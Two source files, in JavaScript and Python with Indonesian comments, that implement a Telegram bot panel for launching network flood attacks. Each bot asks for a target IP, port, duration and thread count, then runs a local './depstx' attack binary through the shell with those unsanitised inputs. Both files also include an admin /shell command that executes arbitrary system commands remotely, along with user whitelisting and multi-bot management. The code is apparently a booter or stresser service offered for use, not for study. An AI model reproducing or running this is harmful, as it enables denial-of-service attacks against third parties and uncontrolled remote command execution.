File: multi_stx.js
// Auto install dependencies jika belum ada
const execSync = require('child_process').execSync;
const deps = ['telegraf', 'fs', 'child_process'];
deps.forEach(dep => {
  try { require.resolve(dep); } catch (e) { execSync(`npm install ${dep}`); }
});

const { Telegraf, Markup } = require('telegraf');
const fs = require('fs');
const { exec } = require('child_process');

// Konfigurasi
const ADMIN_IDS = [7316824198]; // Masukkan ID admin Anda di sini
const ALLOWED_GROUPS = [-1002573717371]; // Set ID Grup di sini jika ingin membatasi grup

const USER_FILE = 'stxusers.json';
const BOTS_FILE = 'bots.json';
const LOG_FILE = 'log.txt';

const MAX_DURATION = 360;
const MAX_THREAD = 1500;

// Inisialisasi file user dan bot bila belum ada
if (!fs.existsSync(USER_FILE)) fs.writeFileSync(USER_FILE, JSON.stringify([]));
if (!fs.existsSync(BOTS_FILE)) fs.writeFileSync(BOTS_FILE, JSON.stringify([]));

// Fungsi memuat user & bot
function loadUsers() {
  try { return JSON.parse(fs.readFileSync(USER_FILE)); } catch { return []; }
}
function saveUsers(users) {
  fs.writeFileSync(USER_FILE, JSON.stringify(users));
}
function loadBots() {
  try { return JSON.parse(fs.readFileSync(BOTS_FILE)); } catch { return []; }
}
function saveBots(tokens) {
  fs.writeFileSync(BOTS_FILE, JSON.stringify(tokens));
}
function logCommand(userId, cmd, params) {
  const line = `[${new Date().toLocaleString()}] UserID: ${userId} CMD: ${cmd} PARAMS: ${JSON.stringify(params)}\n`;
  fs.appendFileSync(LOG_FILE, line);
}

// Fungsi utama membuat bot baru
function createBot(token) {
  const bot = new Telegraf(token);

  // Middleware cek user dan grup
  bot.use(async (ctx, next) => {
    const userId = ctx.from?.id;
    const users = loadUsers();
    // Semua admin dan user terdaftar boleh, serta grup yang diizinkan
    if (
      ADMIN_IDS.includes(userId) ||
      users.includes(userId) ||
      (ctx.chat && ctx.chat.type.endsWith('group') && ALLOWED_GROUPS.includes(ctx.chat.id))
    ) {
      return next();
    }
    // Jika bukan admin/user/grup, tolak
    if (ctx.chat?.type === 'private') {
      await ctx.reply('❌ Akses ditolak. Silakan hubungi admin untuk meminta akses.');
    }
  });

  // /start
  bot.start(async ctx => {
    const userId = ctx.from.id;
    const fullName = ctx.from.first_name || '';
    await ctx.reply(`👋 Halo, ${fullName}!\nSelamat datang di Bot STX!\n\nGunakan /bantuan untuk melihat menu.`);
    // Kirim ID ke admin
    ADMIN_IDS.forEach(adminId => {
      bot.telegram.sendMessage(adminId, `Pengguna baru menekan /start:\n🆔 UserID: ${userId}\n👤 Nama: ${fullName}`);
    });
  });

  // /bantuan
  bot.command('bantuan', ctx => {
    ctx.reply(`📖 Fitur Bot:
- /adduser <id> : Tambah user baru (admin)
- /deleteuser <id> : Hapus user (admin)
- /attack : Mulai serangan
- /myid : Lihat ID Anda
- /shell <perintah> : Jalankan perintah shell (hanya admin)
- /addbot <token> : Tambah bot baru (hanya admin)
- /deletebot <token> : Hapus bot (hanya admin)
- /logs : Lihat log perintah (admin)
- /bantuan : Bantuan
`);
  });

  // /myid
  bot.command('myid', ctx => {
    ctx.reply(`🆔 ID Anda: ${ctx.from.id}`);
  });

  // /adduser & /deleteuser
  bot.command('adduser', ctx => {
    if (!ADMIN_IDS.includes(ctx.from.id)) return ctx.reply('❌ Hanya admin!');
    const args = ctx.message.text.split(' ');
    if (args.length < 2) return ctx.reply('Format: /adduser <id>');
    const uid = Number(args[1]);
    let users = loadUsers();
    if (!users.includes(uid)) {
      users.push(uid);
      saveUsers(users);
      ctx.reply('✅ User berhasil ditambah.');
    } else ctx.reply('User sudah ada.');
  });

  bot.command('deleteuser', ctx => {
    if (!ADMIN_IDS.includes(ctx.from.id)) return ctx.reply('❌ Hanya admin!');
    const args = ctx.message.text.split(' ');
    if (args.length < 2) return ctx.reply('Format: /deleteuser <id>');
    const uid = Number(args[1]);
    let users = loadUsers();
    if (users.includes(uid)) {
      users = users.filter(u => u !== uid);
      saveUsers(users);
      ctx.reply('✅ User berhasil dihapus.');
    } else ctx.reply('User tidak ditemukan.');
  });

  // /attack
  bot.command('attack', async ctx => {
    ctx.session ??= {};
    ctx.session.attack = {};
    ctx.session.attack.userId = ctx.from.id;
    ctx.session.attack.step = 1;
    await ctx.reply('Masukkan IP target:');
    bot.on('text', async innerCtx => {
      if (!innerCtx.session?.attack || innerCtx.from.id !== ctx.from.id) return;
      if (innerCtx.session.attack.step === 1) {
        innerCtx.session.attack.ip = innerCtx.message.text;
        innerCtx.session.attack.step = 2;
        await innerCtx.reply('Masukkan port:');
      } else if (innerCtx.session.attack.step === 2) {
        let port = parseInt(innerCtx.message.text);
        if (isNaN(port)) return innerCtx.reply('Port harus angka! Masukkan ulang port:');
        innerCtx.session.attack.port = port;
        innerCtx.session.attack.step = 3;
        await innerCtx.reply('Masukkan durasi (maks 360 detik):');
      } else if (innerCtx.session.attack.step === 3) {
        let durasi = parseInt(innerCtx.message.text);
        if (isNaN(durasi) || durasi > MAX_DURATION) return innerCtx.reply(`Durasi harus angka dan maksimal ${MAX_DURATION} detik! Masukkan ulang durasi:`);
        innerCtx.session.attack.durasi = durasi;
        innerCtx.session.attack.step = 4;
        await innerCtx.reply('Masukkan jumlah thread (maks 1500):');
      } else if (innerCtx.session.attack.step === 4) {
        let thread = parseInt(innerCtx.message.text);
        if (isNaN(thread) || thread > MAX_THREAD) return innerCtx.reply(`Thread harus angka dan maksimal ${MAX_THREAD}! Masukkan ulang thread:`);
        innerCtx.session.attack.thread = thread;
        innerCtx.session.attack.step = 5;
        // Konfirmasi
        await innerCtx.reply(`Konfirmasi serangan:\nIP: ${innerCtx.session.attack.ip}\nPort: ${innerCtx.session.attack.port}\nDurasi: ${innerCtx.session.attack.durasi}\nThread: ${innerCtx.session.attack.thread}`,
          Markup.inlineKeyboard([
            [Markup.button.callback('✅ YA', 'attack_yes'), Markup.button.callback('❌ TIDAK', 'attack_no')],
            [Markup.button.callback('🛑 STOP', 'attack_stop')]
          ])
        );
      }
    });
  });

  // Handler konfirmasi attack
  bot.action('attack_yes', async ctx => {
    const atk = ctx.session?.attack;
    if (!atk) return ctx.reply('Session tidak ditemukan.');
    // Eksekusi perintah
    const cmd = `./depstx ${atk.ip} ${atk.port} ${atk.durasi} ${atk.thread}`;
    logCommand(atk.userId, 'attack', atk);
    await ctx.reply('⏳ Menjalankan serangan...');
    setTimeout(() => {
      exec(cmd, (err, stdout, stderr) => {
        if (err) ctx.reply('❌ Gagal mengeksekusi serangan.');
        else ctx.reply('🔥 Serangan selesai!');
      });
    }, 4000); // Jeda 4 detik
    await ctx.deleteMessage();
  });

  bot.action('attack_no', async ctx => {
    await ctx.reply('❎ Serangan dibatalkan.');
    await ctx.deleteMessage();
  });
  bot.action('attack_stop', async ctx => {
    await ctx.reply('🛑 Permintaan stop serangan.');
    await ctx.deleteMessage();
  });

  // /shell (admin only)
  bot.command('shell', ctx => {
    if (!ADMIN_IDS.includes(ctx.from.id)) return ctx.reply('Hanya admin!');
    const cmd = ctx.message.text.replace('/shell', '').trim();
    if (!cmd) return ctx.reply('Perintah kosong!');
    exec(cmd, (err, stdout, stderr) => {
      if (err) ctx.reply('Error:\n' + stderr);
      else ctx.reply('Output:\n' + stdout);
    });
  });

  // /addbot & /deletebot (admin only)
  bot.command('addbot', ctx => {
    if (!ADMIN_IDS.includes(ctx.from.id)) return ctx.reply('❌ Hanya admin!');
    const token = ctx.message.text.split(' ')[1];
    if (!token) return ctx.reply('Format: /addbot <token>');
    let tokens = loadBots();
    if (!tokens.includes(token)) {
      tokens.push(token);
      saveBots(tokens);
      ctx.reply('✅ Bot baru ditambahkan! Restart script untuk menjalankan bot baru.');
    } else ctx.reply('Bot sudah ada.');
  });
  bot.command('deletebot', ctx => {
    if (!ADMIN_IDS.includes(ctx.from.id)) return ctx.reply('❌ Hanya admin!');
    const token = ctx.message.text.split(' ')[1];
    if (!token) return ctx.reply('Format: /deletebot <token>');
    let tokens = loadBots();
    if (tokens.includes(token)) {
      tokens = tokens.filter(t => t !== token);
      saveBots(tokens);
      ctx.reply('✅ Bot berhasil dihapus.');
    } else ctx.reply('Bot tidak ditemukan.');
  });

  // /logs (admin only)
  bot.command('logs', ctx => {
    if (!ADMIN_IDS.includes(ctx.from.id)) return ctx.reply('❌ Hanya admin!');
    if (!fs.existsSync(LOG_FILE)) return ctx.reply('Log kosong.');
    const logs = fs.readFileSync(LOG_FILE, 'utf8');
    ctx.replyWithDocument({ source: Buffer.from(logs), filename: 'log.txt' });
  });

  // Run bot
  bot.launch();
  console.log(`Bot berjalan dengan token: ${token}`);
}

// Jalankan semua bot dari file bots.json
const botTokens = loadBots();
if (botTokens.length === 0) {
  console.log('Belum ada token bot! Silakan jalankan /addbot <token> lewat chat bot admin.');
} else {
  botTokens.forEach(token => createBot(token));
}

File: multi_stx.py
# AUTO INSTALL DEPENDENCIES
import sys
import subprocess

def install(package):
    subprocess.check_call([sys.executable, "-m", "pip", "install", package])

for dep in ['pyrogram', 'tgcrypto']:
    try:
        __import__(dep)
    except ImportError:
        install(dep)

import os
import json
import time
from pyrogram import Client, filters, enums
from pyrogram.types import ReplyKeyboardMarkup, InlineKeyboardMarkup, InlineKeyboardButton, Message, InputFile

# KONFIGURASI
ADMIN_IDS = [7316824198]  # Masukkan ID admin Anda di sini
ALLOWED_GROUPS = [-1002573717371]  # Jika ingin membatasi grup, isi di sini
USER_FILE = 'stxusers.json'
BOTS_FILE = 'bots.json'
LOG_FILE = 'log.txt'
SESSION_DIR = 'sessions'
MAX_DURATION = 360
MAX_THREAD = 1500

os.makedirs(SESSION_DIR, exist_ok=True)
if not os.path.exists(USER_FILE):
    with open(USER_FILE, 'w') as f:
        json.dump([], f)
if not os.path.exists(BOTS_FILE):
    with open(BOTS_FILE, 'w') as f:
        json.dump([], f)

def load_users():
    try:
        with open(USER_FILE) as f:
            return json.load(f)
    except:
        return []

def save_users(users):
    with open(USER_FILE, 'w') as f:
        json.dump(users, f)

def load_tokens():
    try:
        with open(BOTS_FILE) as f:
            return json.load(f)
    except:
        return []

def save_tokens(tokens):
    with open(BOTS_FILE, 'w') as f:
        json.dump(tokens, f)

def log_command(user_id, cmd, params):
    line = f"[{time.strftime('%Y-%m-%d %H:%M:%S')}] UserID: {user_id} CMD: {cmd} PARAMS: {json.dumps(params)}\n"
    with open(LOG_FILE, 'a') as f:
        f.write(line)

def is_admin(user_id):
    return user_id in ADMIN_IDS

def is_allowed_group(group_id):
    return group_id in ALLOWED_GROUPS or not ALLOWED_GROUPS

def is_allowed_user(user_id):
    users = load_users()
    return user_id in users or is_admin(user_id)

def send_admins(app, text):
    for admin in ADMIN_IDS:
        try:
            app.send_message(admin, text)
        except Exception:
            pass

# Fungsi utama untuk menjalankan bot instance dari token
def run_bot(token):
    session_name = os.path.join(SESSION_DIR, f'session_{token[:8]}')
    app = Client(session_name, bot_token=token, parse_mode=enums.ParseMode.HTML)

    attack_sessions = {}

    @app.on_message(filters.command("start") & filters.private)
    def start_handler(client, message: Message):
        full_name = message.from_user.first_name or ""
        user_id = message.from_user.id
        text = (f"👋 Halo, {full_name}!\n"
                "Selamat datang di Bot STX!\n"
                "Gunakan /bantuan untuk melihat menu.")
        message.reply(text)
        send_admins(client, f"Pengguna baru menekan /start:\n🆔 UserID: {user_id}\n👤 Nama: {full_name}")

    @app.on_message(filters.command("bantuan"))
    def bantuan_handler(client, message: Message):
        text = ("📖 Fitur Bot:\n"
                "- /adduser <id> : Tambah user baru (admin)\n"
                "- /deleteuser <id> : Hapus user (admin)\n"
                "- /attack : Mulai serangan\n"
                "- /myid : Lihat ID Anda\n"
                "- /shell <perintah> : Jalankan perintah shell (hanya admin)\n"
                "- /addbot <token> : Tambah bot baru (hanya admin)\n"
                "- /deletebot <token> : Hapus bot (hanya admin)\n"
                "- /logs : Lihat log perintah (admin)\n"
                "- /bantuan : Bantuan\n"
                "- /upload <chat_id> : Upload file ke chat id\n"
        )
        message.reply(text)

    @app.on_message(filters.command("myid"))
    def myid_handler(client, message: Message):
        message.reply(f"🆔 ID Anda: {message.from_user.id}")

    @app.on_message(filters.command("adduser") & filters.private)
    def adduser_handler(client, message: Message):
        if not is_admin(message.from_user.id):
            return message.reply("❌ Hanya admin!")
        args = message.text.split()
        if len(args) < 2 or not args[1].isdigit():
            return message.reply("Format: /adduser <id>")
        uid = int(args[1])
        users = load_users()
        if uid not in users:
            users.append(uid)
            save_users(users)
            message.reply("✅ User berhasil ditambah.")
        else:
            message.reply("User sudah ada.")

    @app.on_message(filters.command("deleteuser") & filters.private)
    def deleteuser_handler(client, message: Message):
        if not is_admin(message.from_user.id):
            return message.reply("❌ Hanya admin!")
        args = message.text.split()
        if len(args) < 2 or not args[1].isdigit():
            return message.reply("Format: /deleteuser <id>")
        uid = int(args[1])
        users = load_users()
        if uid in users:
            users.remove(uid)
            save_users(users)
            message.reply("✅ User berhasil dihapus.")
        else:
            message.reply("User tidak ditemukan.")

    @app.on_message(filters.command("addbot") & filters.private)
    def addbot_handler(client, message: Message):
        if not is_admin(message.from_user.id):
            return message.reply("❌ Hanya admin!")
        args = message.text.split()
        if len(args) < 2:
            return message.reply("Format: /addbot <token>")
        token = args[1]
        tokens = load_tokens()
        if token not in tokens:
            tokens.append(token)
            save_tokens(tokens)
            message.reply("✅ Bot baru ditambahkan! Restart script untuk menjalankan bot baru.")
        else:
            message.reply("Bot sudah ada.")

    @app.on_message(filters.command("deletebot") & filters.private)
    def deletebot_handler(client, message: Message):
        if not is_admin(message.from_user.id):
            return message.reply("❌ Hanya admin!")
        args = message.text.split()
        if len(args) < 2:
            return message.reply("Format: /deletebot <token>")
        token = args[1]
        tokens = load_tokens()
        if token in tokens:
            tokens.remove(token)
            save_tokens(tokens)
            message.reply("✅ Bot berhasil dihapus.")
        else:
            message.reply("Bot tidak ditemukan.")

    @app.on_message(filters.command("logs") & filters.private)
    def logs_handler(client, message: Message):
        if not is_admin(message.from_user.id):
            return message.reply("❌ Hanya admin!")
        if not os.path.exists(LOG_FILE):
            return message.reply("Log kosong.")
        with open(LOG_FILE, 'rb') as f:
            message.reply_document(f, caption="Log Perintah")

    @app.on_message(filters.command("shell") & filters.private)
    def shell_handler(client, message: Message):
        if not is_admin(message.from_user.id):
            return message.reply("Hanya admin!")
        cmd = message.text.replace('/shell', '').strip()
        if not cmd:
            return message.reply("Perintah kosong!")
        try:
            result = subprocess.run(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True, timeout=20)
            output = result.stdout if result.returncode == 0 else result.stderr
            message.reply(f"<code>{output}</code>")
        except Exception as e:
            message.reply(f"Error: {str(e)}")

    # UPLOAD FILE KE CHAT_ID DENGAN DRAG AND DROP DARI TERMINAL
    @app.on_message(filters.command("upload") & filters.private)
    def upload_handler(client, message: Message):
        if not is_admin(message.from_user.id):
            return message.reply("❌ Hanya admin!")
        args = message.text.split()
        if len(args) < 2:
            return message.reply("Gunakan: /upload <chat_id>")
        chat_id = args[1]
        message.reply("Silakan drag & drop file ke terminal (input path file):")
        try:
            file_path = input("Masukkan path file yang akan diupload: ").strip()
            if not os.path.isfile(file_path):
                return message.reply("File tidak ditemukan.")
            client.send_document(int(chat_id), InputFile(file_path))
            message.reply("✅ File berhasil dikirim.")
        except Exception as e:
            message.reply(f"Error upload: {str(e)}")

    # MIDDLEWARE: CEK AKSES USER/ADMIN/GRUP
    @app.on_message(filters.group | filters.private)
    def access_control(client, message: Message):
        user_id = message.from_user.id
        chat = message.chat
        allowed = False
        if is_admin(user_id) or is_allowed_user(user_id):
            allowed = True
        elif chat.type in [enums.ChatType.GROUP, enums.ChatType.SUPERGROUP] and is_allowed_group(chat.id):
            allowed = True
        if not allowed:
            if chat.type == enums.ChatType.PRIVATE:
                message.reply("❌ Akses ditolak. Silakan hubungi admin untuk meminta akses.")
            return

    # ATTACK FUNGSI (PRIVATE & GRUP)
    @app.on_message(filters.command("attack"))
    def attack_entry(client, message: Message):
        user_id = message.from_user.id
        chat_id = message.chat.id
        # Simpan sesi per user
        attack_sessions[user_id] = {"step": 1, "data": {}, "chat_id": chat_id}
        message.reply("Masukkan IP target:")

    @app.on_message(filters.text & ~filters.command(["start", "bantuan", "myid", "adduser", "deleteuser", "addbot", "deletebot", "logs", "shell", "upload"]))
    def attack_steps(client, message: Message):
        user_id = message.from_user.id
        session = attack_sessions.get(user_id)
        if not session or session["chat_id"] != message.chat.id:
            return
        step = session["step"]
        data = session["data"]
        if step == 1:
            data["ip"] = message.text.strip()
            session["step"] = 2
            message.reply("Masukkan port:")
        elif step == 2:
            try:
                port = int(message.text.strip())
                data["port"] = port
                session["step"] = 3
                message.reply("Masukkan durasi (maks 360 detik):")
            except:
                message.reply("Port harus angka! Masukkan ulang port:")
        elif step == 3:
            try:
                durasi = int(message.text.strip())
                if durasi > MAX_DURATION or durasi < 1:
                    raise ValueError
                data["durasi"] = durasi
                session["step"] = 4
                message.reply("Masukkan jumlah thread (maks 1500):")
            except:
                message.reply(f"Durasi harus angka dan maksimal {MAX_DURATION} detik! Masukkan ulang durasi:")
        elif step == 4:
            try:
                thread = int(message.text.strip())
                if thread > MAX_THREAD or thread < 1:
                    raise ValueError
                data["thread"] = thread
                session["step"] = 5
                # Konfirmasi
                markup = InlineKeyboardMarkup([
                    [
                        InlineKeyboardButton("✅ YA", callback_data="attack_yes"),
                        InlineKeyboardButton("❌ TIDAK", callback_data="attack_no")
                    ],
                    [
                        InlineKeyboardButton("🛑 STOP", callback_data="attack_stop")
                    ]
                ])
                confirm_msg = (f"Konfirmasi serangan:\n"
                               f"IP: {data['ip']}\n"
                               f"Port: {data['port']}\n"
                               f"Durasi: {data['durasi']}\n"
                               f"Thread: {data['thread']}")
                msg = message.reply(confirm_msg, reply_markup=markup)
                session["confirm_msg_id"] = msg.id
            except:
                message.reply(f"Thread harus angka dan maksimal {MAX_THREAD}! Masukkan ulang thread:")

    @app.on_callback_query()
    def handle_attack_confirm(client, callback_query):
        user_id = callback_query.from_user.id
        session = attack_sessions.get(user_id)
        if not session:
            callback_query.answer("Session tidak ditemukan.")
            return
        data = session["data"]
        chat_id = session["chat_id"]
        # Hapus pesan konfirmasi setelah ditekan
        try:
            client.delete_messages(chat_id, [session.get("confirm_msg_id", callback_query.message.id)])
        except:
            pass
        if callback_query.data == "attack_yes":
            cmd = f"./depstx {data['ip']} {data['port']} {data['durasi']} {data['thread']}"
            log_command(user_id, "attack", data)
            client.send_message(chat_id, "⏳ Menjalankan serangan...")
            time.sleep(4)
            try:
                result = subprocess.run(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True, timeout=(data['durasi']+5))
                if result.returncode != 0:
                    client.send_message(chat_id, f"❌ Gagal mengeksekusi serangan.\n{result.stderr}")
                else:
                    client.send_message(chat_id, "🔥 Serangan selesai!")
            except Exception as e:
                client.send_message(chat_id, f"❌ Gagal mengeksekusi serangan.\n{str(e)}")
        elif callback_query.data == "attack_no":
            client.send_message(chat_id, "❎ Serangan dibatalkan.")
        elif callback_query.data == "attack_stop":
            client.send_message(chat_id, "🛑 Permintaan stop serangan.")
        attack_sessions.pop(user_id, None)
        callback_query.answer()

    print(f"Bot berjalan dengan token: {token}")
    app.run()

if __name__ == "__main__":
    tokens = load_tokens()
    if not tokens:
        print("Belum ada token bot! Tambahkan token dengan perintah /addbot <token> melalui chat admin.")
    else:
        from multiprocessing import Process
        procs = []
        for token in tokens:
            p = Process(target=run_bot, args=(token,))
            p.start()
            procs.append(p)
        for p in procs:
            p.join()